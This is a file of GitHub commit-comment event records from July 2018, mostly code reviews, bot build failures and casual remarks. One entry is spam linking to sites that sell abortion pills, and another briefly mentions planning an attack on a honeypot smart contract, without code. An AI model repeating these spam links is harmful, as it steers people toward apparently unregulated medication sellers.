{"id":"7975760945","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29732668,"position":132,"line":92,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-17T10:20:57Z","updated_at":"2018-07-17T10:20:57Z","author_association":"NONE","body":"You can move this line up and `require(fundsTransmit > 0` to save gas."}},"created_at":"2018-07-17T10:20:57Z"}
{"id":"7975768704","type":"CommitCommentEvent","actor":{"login":"JohnForster"},"repo":{"name":"archmagos/Makers-BNB"},"payload":{"comment":{"id":29732684,"position":7,"line":5,"path":"README.md","commit_id":"f5ecf26b13f09a1d4981d22ad7000ac56ebe9487","created_at":"2018-07-17T10:22:30Z","updated_at":"2018-07-17T10:22:30Z","author_association":"COLLABORATOR","body":"Should read ship owner."}},"created_at":"2018-07-17T10:22:30Z"}
{"id":"7975770732","type":"CommitCommentEvent","actor":{"login":"JohnForster"},"repo":{"name":"archmagos/Makers-BNB"},"payload":{"comment":{"id":29732686,"position":9,"line":7,"path":"README.md","commit_id":"f5ecf26b13f09a1d4981d22ad7000ac56ebe9487","created_at":"2018-07-17T10:22:51Z","updated_at":"2018-07-17T10:22:51Z","author_association":"COLLABORATOR","body":"'visitors' should read 'landlubbers'"}},"created_at":"2018-07-17T10:22:51Z"}
{"id":"7975770926","type":"CommitCommentEvent","actor":{"login":"NikDog2705"},"repo":{"name":"NikDog2705/WolfPack"},"payload":{"comment":{"id":29732687,"position":null,"line":null,"path":null,"commit_id":"50718b69402579a7aec17357c95ee5ddb6918dfd","created_at":"2018-07-17T10:22:53Z","updated_at":"2018-07-17T10:22:53Z","author_association":"OWNER","body":"Добавил движение оленя"}},"created_at":"2018-07-17T10:22:53Z"}
{"id":"7975773563","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29732690,"position":31,"line":26,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-17T10:23:22Z","updated_at":"2018-07-17T10:23:22Z","author_association":"NONE","body":"Ah ok. I have never seen it being done, but what if you did `it(\"Check if the instance exist 10fbf811-05d2-4cf2-92da-79744635e178\", )`. Then you can parse the results for uuids. Here it is clear there is no sequence, and you are unlikely to give the same uuid to 2 different tests :)"}},"created_at":"2018-07-17T10:23:22Z"}
{"id":"7975779524","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29732698,"position":48,"line":38,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-17T10:24:29Z","updated_at":"2018-07-17T10:24:29Z","author_association":"NONE","body":"Because you need to `return remittanceCont.then(`. Otherwise the promise chain is orphaned and the error happens, is sent along the chain, but there is no `.catch`.\r\nWhat `it` does is add `.catch` to the promise chain you `return`."}},"created_at":"2018-07-17T10:24:29Z"}
{"id":"7975807454","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29732780,"position":null,"line":null,"path":null,"commit_id":"cc06c312962c9213d20dd23b3ac8bff390ed2bdb","created_at":"2018-07-17T10:30:00Z","updated_at":"2018-07-17T10:30:00Z","author_association":"NONE","body":"Shouldn't the `_SUBSYSTEM_INFORMATION_TYPE` be for `PHNT_MODE_USER` only? Since when compiling ` KProcessHacker.sys`, I'm getting errors:\r\n```\r\nf:/ProgramFiler-x86/WindowsKits/Include/10.0.16299.0/km\\ntddk.h(5447,5):  note: previous definition is here\r\n    SubsystemInformationTypeWSL = 1,\r\n    ^\r\nIn file included from devctrl.c:22:\r\nIn file included from ./include\\kph.h:6:\r\nIn file included from ../phnt/include\\phnt.h:68:\r\n../phnt/include\\ntpsapi.h(995,5):  error: redefinition of enumerator 'MaxSubsystemInformationType'\r\n    MaxSubsystemInformationType\r\n    ^\r\nf:/ProgramFiler-x86/WindowsKits/Include/10.0.16299.0/km\\ntddk.h(5449,3):  note: previous definition is here\r\n} SUBSYSTEM_INFORMATION_TYPE, *PSUBSYSTEM_INFORMATION_TYPE;\r\n  ^\r\n```\r\nUsing `clang-cl` to check everything before building with MSVC.\r\n\r\nAFAICS, it should be patched like this:\r\n```diff\r\n--- a/phnt/include/ntpsapi.h 2018-07-16 20:48:16\r\n+++ b/phnt/include/ntpsapi.h 2018-07-17 10:21:22\r\n@@ -987,6 +987,8 @@\r\n     UNICODE_STRING ThreadName;\r\n } THREAD_NAME_INFORMATION, *PTHREAD_NAME_INFORMATION;\r\n\r\n+#if (PHNT_MODE != PHNT_MODE_KERNEL)\r\n+\r\n // private\r\n typedef enum _SUBSYSTEM_INFORMATION_TYPE\r\n {\r\n@@ -997,8 +999,6 @@\r\n\r\n // Processes\r\n\r\n-#if (PHNT_MODE != PHNT_MODE_KERNEL)\r\n-\r\n NTSYSCALLAPI\r\n```\r\n"}},"created_at":"2018-07-17T10:30:00Z"}
{"id":"7975810125","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29732789,"position":46,"line":87,"path":"contracts/Remittance.sol","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T10:30:30Z","updated_at":"2018-07-17T10:30:30Z","author_association":"NONE","body":"What is the rationale for the `payID`?"}},"created_at":"2018-07-17T10:30:30Z"}
{"id":"7975810431","type":"CommitCommentEvent","actor":{"login":"lex111"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29732791,"position":305,"line":919,"path":"manuscript/chapter2.md","commit_id":"4cce8e703e973d20184b89a200e0eaa4b58a2b1c","created_at":"2018-07-17T10:30:34Z","updated_at":"2018-07-17T10:30:34Z","author_association":"COLLABORATOR","body":"Ой, конечно, да! У тебя глаз-алмаз! :smiley: "}},"created_at":"2018-07-17T10:30:34Z"}
{"id":"7975814350","type":"CommitCommentEvent","actor":{"login":"salty-sweet"},"repo":{"name":"salty-sweet/Kemonomimi-Website"},"payload":{"comment":{"id":29732798,"position":null,"line":null,"path":null,"commit_id":"6b37562572eb3d8738d870899a66ed56ef5973be","created_at":"2018-07-17T10:31:23Z","updated_at":"2018-07-17T10:31:23Z","author_association":"OWNER","body":"**I BROKE IT!** HOW THE FUCK DID I MANAGE TO BREAK IT THROUGH RENAMINGGGGG"}},"created_at":"2018-07-17T10:31:23Z"}
{"id":"7975815541","type":"CommitCommentEvent","actor":{"login":"samchesney"},"repo":{"name":"cdoak/lib_spi"},"payload":{"comment":{"id":29732802,"position":22,"line":22,"path":"lib_spi/src/spi.xc","commit_id":"ec8d547a0dd2df392a0fb76c9e879f71248f54e4","created_at":"2018-07-17T10:31:37Z","updated_at":"2018-07-17T10:31:37Z","author_association":"NONE","body":"I think lines 22 to 25 could be replaced by a call to the `unreachable(msg)` macro from lib_xassert"}},"created_at":"2018-07-17T10:31:37Z"}
{"id":"7975816049","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29732803,"position":null,"line":null,"path":null,"commit_id":"d2f0b46fd7ca84228917a7ab0d58fdfc812b0ccc","created_at":"2018-07-17T10:31:43Z","updated_at":"2018-07-17T10:31:43Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-17T10:31:43Z"}
{"id":"7975821206","type":"CommitCommentEvent","actor":{"login":"lex111"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29732813,"position":null,"line":null,"path":null,"commit_id":"4cce8e703e973d20184b89a200e0eaa4b58a2b1c","created_at":"2018-07-17T10:32:46Z","updated_at":"2018-07-17T10:32:46Z","author_association":"COLLABORATOR","body":"@katienazarova спасибо, исправил в https://github.com/the-road-to-learn-react/the-road-to-learn-react-russian/pull/2/commits/1563ea7362d3b6aca60319eed27274e4e079c22c"}},"created_at":"2018-07-17T10:32:46Z"}
{"id":"7975823279","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":29732816,"position":5,"line":224,"path":"src/less/selectize.less","commit_id":"bbdde959beb26d019bc8005de21564ae025a1458","created_at":"2018-07-17T10:33:12Z","updated_at":"2018-07-17T10:33:12Z","author_association":"NONE","body":"This breaks the option display when you upgrade from v0.12.4 to v0.12.5 if your custom option renderer doesn't add the ``option`` class, which is almost always the case because the documentation doesn't say the ``option`` class is needed."}},"created_at":"2018-07-17T10:33:12Z"}
{"id":"7975824343","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29732821,"position":17,"line":14,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-17T10:33:26Z","updated_at":"2018-07-17T10:33:26Z","author_association":"NONE","body":"Why not do `Remittance.new().then(instance => remittanceCont = instance)`. Then you can drop the `.then` in each test."}},"created_at":"2018-07-17T10:33:26Z"}
{"id":"7975828577","type":"CommitCommentEvent","actor":{"login":"pepsm"},"repo":{"name":"pepsm/WebDesign-Mindset"},"payload":{"comment":{"id":29732831,"position":null,"line":null,"path":null,"commit_id":"9981befbf2c88d09de109d8ce448f3a06457a43a","created_at":"2018-07-17T10:34:21Z","updated_at":"2018-07-17T10:34:21Z","author_association":"OWNER","body":"settings which i will delete"}},"created_at":"2018-07-17T10:34:21Z"}
{"id":"7975832445","type":"CommitCommentEvent","actor":{"login":"cristealucian97"},"repo":{"name":"cristealucian97/homeautomationbeta"},"payload":{"comment":{"id":29732833,"position":null,"line":null,"path":null,"commit_id":"790a04c44c2fb6bf4fc09b9dcb9f1d2144936093","created_at":"2018-07-17T10:35:13Z","updated_at":"2018-07-17T10:35:13Z","author_association":"OWNER","body":"Goog job my friend!"}},"created_at":"2018-07-17T10:35:13Z"}
{"id":"7975834103","type":"CommitCommentEvent","actor":{"login":"subaritejo"},"repo":{"name":"subaritejo/Cytotec"},"payload":{"comment":{"id":29732837,"position":null,"line":null,"path":null,"commit_id":"d45860cb1874ff9ff3c1fa96532d89b432e6904f","created_at":"2018-07-17T10:35:33Z","updated_at":"2018-07-17T10:35:33Z","author_association":"OWNER","body":"http://klinikdiana.com/\r\nhttp://klinikdiana.com/obat-aborsi-jakarta/\r\nhttp://klinikdiana.com/obat-aborsi-di-malang/\r\nhttp://klinikdiana.com/obat-aborsi-semarang/\r\nhttp://klinikdiana.com/obat-aborsi-surabaya/\r\nhttp://klinikdiana.com/obat-aborsi-tangerang/"}},"created_at":"2018-07-17T10:35:33Z"}
{"id":"7975837944","type":"CommitCommentEvent","actor":{"login":"mastef"},"repo":{"name":"HaxeFoundation/HaxeManual"},"payload":{"comment":{"id":29732845,"position":null,"line":null,"path":null,"commit_id":"d55d922a7d93daddf669d049f263ab2d850d7b4f","created_at":"2018-07-17T10:36:23Z","updated_at":"2018-07-17T10:36:23Z","author_association":"CONTRIBUTOR","body":"@markknol it seems that this information is not correct. `-D source-map` should be `-D js-source-map` ( at least for haxe 3 & haxe <4.0.0 preview4 ). `-D source-map` doesn't do anything, while `-D js-source-map` correctly generates source maps for html5 release builds.\r\n\r\nThis is the number 1 hit when googling haxe source maps, and I've been stuck debugging this now at least twice in the past months when researching why the source maps aren't generated. 😓 \r\n\r\nRelated issue https://github.com/HaxeFoundation/haxe/issues/5836"}},"created_at":"2018-07-17T10:36:23Z"}
{"id":"7975842799","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29732855,"position":null,"line":null,"path":null,"commit_id":"9fbaa7fdce6b2c40cbb2d90e28683104c93a15b9","created_at":"2018-07-17T10:37:27Z","updated_at":"2018-07-17T10:37:27Z","author_association":"COLLABORATOR","body":"変数名を少し考えて作りましょう。\r\nfmtーフォーマットですが何のフォーマットなのか\r\nnow-todayのほうが意に沿っているかと思います"}},"created_at":"2018-07-17T10:37:27Z"}
{"id":"7975845182","type":"CommitCommentEvent","actor":{"login":"green88ntv"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29732857,"position":null,"line":null,"path":null,"commit_id":"cef9143141ac0a810ead0b5711a13f1d24574e14","created_at":"2018-07-17T10:37:56Z","updated_at":"2018-07-17T10:37:56Z","author_association":"NONE","body":"very good"}},"created_at":"2018-07-17T10:37:56Z"}
{"id":"7975847939","type":"CommitCommentEvent","actor":{"login":"green88ntv"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":29732861,"position":20,"line":253,"path":"rfcs/modules/0001-pkg:list_pkgs-output.md","commit_id":"cef9143141ac0a810ead0b5711a13f1d24574e14","created_at":"2018-07-17T10:38:33Z","updated_at":"2018-07-17T10:38:33Z","author_association":"NONE","body":"x8634386"}},"created_at":"2018-07-17T10:38:33Z"}
{"id":"7975849422","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"processhacker/processhacker"},"payload":{"comment":{"id":29732864,"position":7,"line":53,"path":"phnt/include/ntnls.h","commit_id":"a349a42c751fa9c3304b50a3cfc5f16e1c7f4148","created_at":"2018-07-17T10:38:51Z","updated_at":"2018-07-17T10:38:51Z","author_association":"NONE","body":"I get the same redefinition error here as in `ntpsapi.h`. Shouldn't these 3 be for `PHNT_MODE_USER` only?:\r\n```diff\r\n--- a/phnt/include/ntnls.h 2018-07-16 20:48:16\r\n+++ b/phnt/include/ntnls.h 2018-07-17 10:28:59\r\n@@ -47,8 +47,10 @@\r\n     PUSHORT LowerCaseTable;\r\n } NLSTABLEINFO, *PNLSTABLEINFO;\r\n\r\n+#if (PHNT_MODE != PHNT_MODE_KERNEL)\r\n NTSYSAPI USHORT NlsAnsiCodePage;\r\n NTSYSAPI BOOLEAN NlsMbCodePageTag;\r\n NTSYSAPI BOOLEAN NlsMbOemCodePageTag;\r\n+#endif\r\n```\r\nWith that patch, I'm able to compile and link `KProcessHacker.sys`. Seems to work fine."}},"created_at":"2018-07-17T10:38:51Z"}
{"id":"7975850046","type":"CommitCommentEvent","actor":{"login":"fac30ff"},"repo":{"name":"podolsky4/TextMessenger"},"payload":{"comment":{"id":29732866,"position":null,"line":null,"path":null,"commit_id":"dc13165055025fe6a915a8073c8e4ce3db9abe39","created_at":"2018-07-17T10:38:59Z","updated_at":"2018-07-17T10:38:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Connect Spring Data JPA to application](https://trello.com/c/iSqaj2Ol/16-connect-spring-data-jpa-to-application)"}},"created_at":"2018-07-17T10:38:59Z"}
{"id":"7975850567","type":"CommitCommentEvent","actor":{"login":"nabinhait"},"repo":{"name":"frappe/erpnext"},"payload":{"comment":{"id":29732867,"position":null,"line":null,"path":null,"commit_id":"fc0a5833a52a329ecad5c32179f2e60cb48e5030","created_at":"2018-07-17T10:39:06Z","updated_at":"2018-07-17T10:39:06Z","author_association":"MEMBER","body":"@v1kku Thanks, pushed a fix."}},"created_at":"2018-07-17T10:39:06Z"}
{"id":"7975851124","type":"CommitCommentEvent","actor":{"login":"aimtime"},"repo":{"name":"aimtime/jfinal"},"payload":{"comment":{"id":29732868,"position":null,"line":null,"path":null,"commit_id":"66c55fce376860108925ed8ae7ecd15b47eda4e3","created_at":"2018-07-17T10:39:13Z","updated_at":"2018-07-17T10:39:13Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-17T10:39:13Z"}
{"id":"7975852762","type":"CommitCommentEvent","actor":{"login":"fac30ff"},"repo":{"name":"podolsky4/TextMessenger"},"payload":{"comment":{"id":29732870,"position":null,"line":null,"path":null,"commit_id":"f8ff1e2d1a952fe5e6439ae138cc5de3f7d694fe","created_at":"2018-07-17T10:39:34Z","updated_at":"2018-07-17T10:39:34Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [modifying .gitignore file with various used software on production (jetBrains, win, mac, Node.js)](https://trello.com/c/fiyeqvW0/30-modifying-gitignore-file-with-various-used-software-on-production-jetbrains-win-mac-nodejs)"}},"created_at":"2018-07-17T10:39:34Z"}
{"id":"7975860758","type":"CommitCommentEvent","actor":{"login":"Legan1993"},"repo":{"name":"urjaman/openwrt-w268r"},"payload":{"comment":{"id":29732883,"position":null,"line":null,"path":null,"commit_id":"65b135ddc29822af4e7e644037e5353341290c33","created_at":"2018-07-17T10:41:11Z","updated_at":"2018-07-17T10:41:11Z","author_association":"NONE","body":"Do I understand correctly that this is the OpenWRT firmware for the Tenda w268r router?"}},"created_at":"2018-07-17T10:41:11Z"}
{"id":"7975864564","type":"CommitCommentEvent","actor":{"login":"FredKruse"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29732887,"position":5,"line":43,"path":"languagetool-gui-commons/src/main/java/org/languagetool/gui/Configuration.java","commit_id":"96aa70a5111715ce848f9d2567b949f869c806fa","created_at":"2018-07-17T10:42:01Z","updated_at":"2018-07-17T10:42:01Z","author_association":"CONTRIBUTOR","body":"As far as I see, the requirements of the standalone/server implementation and the office extension are different:\r\nThe standalone/server implementation does a check at once from the beginning to the end of the text. \r\nThe LO-grammar-checking-interface is implemented that it checks the text paragraph by paragraph and inside a paragraph sentence by sentence. Paragraphs on the visible side are checked as first. An iteration of the whole text is done when the document is loaded. After that, only changed paragraphs are checked again.\r\nSo in principle the LO-interface does what a cache could do. I think this is the reason, why the LT-cache doesn't work inside the extension.\r\nFor the sentence rules this works perfect. For text-level rules it's not optimal (nicely spoken) because at a change of on paragraph the whole text has to be checked by the text-level rules.\r\n\r\n**An idea to solve this problem could be a radical change of implementation of text-level rules.** The rules should start with the actual checked sentence and iterate back and forward to find a problem. \r\n_Example_: A closing quotation mark is found in the sentence to check. Then you have to iterate back till you found another closing quotation mark (error: opening quotation mark is missing) or an opening quotation mark (no error).\r\nThis solution could be interesting also for the LT-cache (not the whole text has to be checked again, if there is only a change in one sentence or paragraph. The most text-level rules return a no match result immediately if the interesting keywords/signs are not found.\r\nBut all text-level rules have to be new implemented if we prefer such a solution.\r\n\r\n\r\n**A compromise for the LO extension is the following (I will load it up to github immediately):**\r\n\r\n1. Not the whole text is changed but the actual paragraph plus N paragraphs before and after it. As long as a user enter text to the document the actual paragraph is checked again and again. One core is used nearly permanently (also at LT 3.9). This is feature of the LO-interface and not of the LT-implementation. It made no difference in practice if LT checks one paragraph or 2N+1 (tested for N = 5). So this is a good compromise.\r\n\r\n2. The first full check of Text by LT 4.2 took 3 times longer for N = 5 than for N = 0 (same as 3.9, all text-level rules works only in the limit of one paragraph). The reason was that LT has to check the text 2N + 1 times for text-level rules. A real full text check takes nearly the same time as N = 0 but a user has to wait a long time till he sees the first results (on my reference machine it takes more than 2 minutes for a 50K words text).\r\nFor 4.3 I developed a mechanism, that checks 12N paragraphs at once. The result for 10N paragraphs are stored in a cache. The results are shown very fast (tested with N = 5). It is only a very small difference in waiting time till the user sees the first result (It's so short, I couldn't measure it). On the other hand there is only overlapping of 20% in checked paragraphs. The whole time to check a text was lesser than a factor 1.2 in comparison to N = 0.\r\nFrom my point of view N = 5 should be the default value for 4.3.\r\n\r\n3. As reported as bug earlier, marks are not removed when the problem is solved in another paragraph (e.g. add a closing quotation mark). For that reason I implemented a function that forces the LO-interface to check the whole text again. This function costs a lot of computing power.\r\nFor 4.3 I found a trick to limit the check to the 2N surrounding paragraphs that could be affected by the change at the current paragraph. The change in computing time is so small that I couldn't measure it with my tools.\r\nThis setting should also be standard in 4.3."}},"created_at":"2018-07-17T10:42:01Z"}
{"id":"7975867182","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29732892,"position":null,"line":null,"path":null,"commit_id":"d09e405a5928ae10f569bcfc8d17d910a1b0450a","created_at":"2018-07-17T10:42:33Z","updated_at":"2018-07-17T10:42:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-104232 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180717-104232\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-17T10:42:33Z"}
{"id":"7975872569","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"alex707/L1"},"payload":{"comment":{"id":29732898,"position":13,"line":13,"path":"4.rb","commit_id":"74a4fd1e725d80e17b710300975e6db815377e77","created_at":"2018-07-17T10:43:44Z","updated_at":"2018-07-17T10:43:44Z","author_association":"NONE","body":"лишние пробелы внутри скобок"}},"created_at":"2018-07-17T10:43:44Z"}
{"id":"7975873593","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29732903,"position":null,"line":null,"path":null,"commit_id":"f97195ba12c630a99f835f06342442df26f6c5ac","created_at":"2018-07-17T10:43:57Z","updated_at":"2018-07-17T10:43:57Z","author_association":"OWNER","body":"#18 "}},"created_at":"2018-07-17T10:43:57Z"}
{"id":"7975873598","type":"CommitCommentEvent","actor":{"login":"NikDog2705"},"repo":{"name":"NikDog2705/WolfPack"},"payload":{"comment":{"id":29732904,"position":null,"line":null,"path":null,"commit_id":"1ef6d8e009476d26a0a9dcce0e0ea70f8866f06e","created_at":"2018-07-17T10:43:57Z","updated_at":"2018-07-17T10:43:57Z","author_association":"OWNER","body":"исправил один косяк в движении оленя"}},"created_at":"2018-07-17T10:43:57Z"}
{"id":"7975874996","type":"CommitCommentEvent","actor":{"login":"Kroc"},"repo":{"name":"Galleondragon/qb64"},"payload":{"comment":{"id":29732906,"position":null,"line":null,"path":null,"commit_id":"ed28f453f03907f6957a38b8b47c5c353c574f95","created_at":"2018-07-17T10:44:15Z","updated_at":"2018-07-17T10:44:15Z","author_association":"NONE","body":"Nice, thanks!"}},"created_at":"2018-07-17T10:44:15Z"}
{"id":"7975876047","type":"CommitCommentEvent","actor":{"login":"manik1235"},"repo":{"name":"manik1235/learningwithfriends"},"payload":{"comment":{"id":29732907,"position":5,"line":6,"path":"main.py","commit_id":"e6223a19b8505db238c6955a15b3e5a3b1e3a87f","created_at":"2018-07-17T10:44:29Z","updated_at":"2018-07-17T10:44:29Z","author_association":"OWNER","body":"I didn't know we could leave line notes in GitHub, so that's mostly why I'm doing it. \r\nThis is the line that is weird-ish (but it works!) \r\n\r\nYour function is perfect! "}},"created_at":"2018-07-17T10:44:29Z"}
{"id":"7975876894","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/ReentrantIssue"},"payload":{"comment":{"id":29732908,"position":45,"line":45,"path":"contracts/HoneyProcessor.sol","commit_id":"44a5860753abe842e0029718c4e51376598de087","created_at":"2018-07-17T10:44:40Z","updated_at":"2018-07-17T10:44:40Z","author_association":"OWNER","body":"As per my understanding the \"If(false)\" security vulnerability issue is there only with compiler version - 0.4.5.  Here the HoneyPot Contract is compiled at version 0.4.21 and also I verified through etherscan that optimizer was not used.  So I believe as long as we are coordinating the attack in a single transaction,  we are good. Please correct me if I am missing something here. "}},"created_at":"2018-07-17T10:44:40Z"}
{"id":"7975877619","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":29732909,"position":null,"line":null,"path":null,"commit_id":"6c4ea3033e30125c63a3f8f6505ea13c858ab9b0","created_at":"2018-07-17T10:44:50Z","updated_at":"2018-07-17T10:44:50Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n  \"docker-worker:capability:privileged\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:index.project.releng.services.requests.pull-request.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:get:repo:github.com/mozilla-releng/services:pull-request\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"assume:hook-id:project-releng/services-master-*\",\n    \"hooks:modify-hook:project-releng/services-master-*\",\n    \"queue:create-task:highest:aws-provisioner-v1/releng-*\",\n    \"queue:scheduler-id:taskcluster-github\",\n    \"queue:route:index.project.releng.services.requests.pull-request.*\",\n    \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\",\n    \"queue:route:index.project.releng.services.requests.pull-request.6c4ea3033e30125c63a3f8f6505ea13c858ab9b0\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-17T10:44:50.233Z\n\n</details>"}},"created_at":"2018-07-17T10:44:50Z"}
{"id":"7975890577","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29732922,"position":69,"line":64,"path":"src/containers/VisiblePostList.js","commit_id":"de7735ae7840f480f73233d1bc85e9e6af0cf15c","created_at":"2018-07-17T10:47:37Z","updated_at":"2018-07-17T10:47:37Z","author_association":"NONE","body":"Прикольно."}},"created_at":"2018-07-17T10:47:37Z"}
{"id":"7975893798","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29732927,"position":11,"line":11,"path":"e10/e10_05.py","commit_id":"1ae132f47445eb863ce05fd3850fdd919b3f43bc","created_at":"2018-07-17T10:48:18Z","updated_at":"2018-07-17T10:48:18Z","author_association":"COLLABORATOR","body":"成田\r\nコメントが親になってます"}},"created_at":"2018-07-17T10:48:18Z"}
{"id":"7975902161","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29732938,"position":27,"line":27,"path":"e10/e10_05.py","commit_id":"1ae132f47445eb863ce05fd3850fdd919b3f43bc","created_at":"2018-07-17T10:50:07Z","updated_at":"2018-07-17T10:50:07Z","author_association":"COLLABORATOR","body":"成田\r\nファイルのみについて10-4と結果が異なりますが、これは想定される違いでしょうか。"}},"created_at":"2018-07-17T10:50:07Z"}
{"id":"7975903170","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29732940,"position":null,"line":null,"path":null,"commit_id":"509f58658f8641b87a86f11317d83f608cd3b234","created_at":"2018-07-17T10:50:19Z","updated_at":"2018-07-17T10:50:19Z","author_association":"OWNER","body":"This code segment(in green) explains the concept where the user **might not** have visit any page or the page has not been cached, either statically or dynamically for later use, a default \"offline\" page is displayed to signify that the resource is not yet available. However, if the user visits the resource once the network is gained, no offline message will be  displayed if it is cached at any point of time"}},"created_at":"2018-07-17T10:50:19Z"}
{"id":"7975905195","type":"CommitCommentEvent","actor":{"login":"ITkevin1"},"repo":{"name":"ZenXChaos/ThirdPersonShooter-AnimationSets"},"payload":{"comment":{"id":29732942,"position":null,"line":null,"path":null,"commit_id":"382fd3ef55b01a2523f7ec2f002b2914834c4d27","created_at":"2018-07-17T10:50:46Z","updated_at":"2018-07-17T10:50:46Z","author_association":"NONE","body":"nbvn"}},"created_at":"2018-07-17T10:50:46Z"}
